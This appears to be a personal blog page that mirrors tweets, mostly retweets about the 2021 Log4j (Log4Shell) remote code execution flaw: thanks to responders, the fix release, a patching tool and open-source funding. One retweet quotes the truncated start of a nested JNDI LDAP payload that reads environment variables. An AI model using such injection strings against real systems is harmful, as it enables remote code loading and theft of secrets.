Lee Turner

A random stream of thoughts and software experiments

Thank you @Cloudflare #Log4Shell #log4jRCE #log4j2


RT @brunoborges: If you got impacted by the #Log4J issue, how would you thank the work done, for free, by the engineer who fixed the issu…


This is what people mean when they talk about open source being broken. https://x.com/FiloSottile/status/1469441487175880711


RT @aprilwright: The worst game #log4j #Log4Shell


RT @StaticFlow: In case anyone hasn’t discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:us…


RT @volker_simonis: I’ve written a simple (i.e. standalone, no dependencies) Java program which patches JndiLookup.lookup() to return a fix…


RT @RemkoPopma: @brunoborges Log4j 2.15.0 has been released with a fix. Release notes will be sent out later.


So many new things coming out of the @ideavim plugin. Really pleased to see this one - “Make IdeaVim compatible with CodeWithMe” https://x.com/ideavim/status/1469258030357299203


If you are #jvm dev you should take a look at this - LogJam: RCE 0-day exploit found in log4j, a popular Java logging package - https://www.lunasec.io/docs/blog/log4j-zero-day/


RT @jeli_io: We made a new thing! Jeli’s all about evolving the industry, but building a new post-incident process is…super hard. So we d…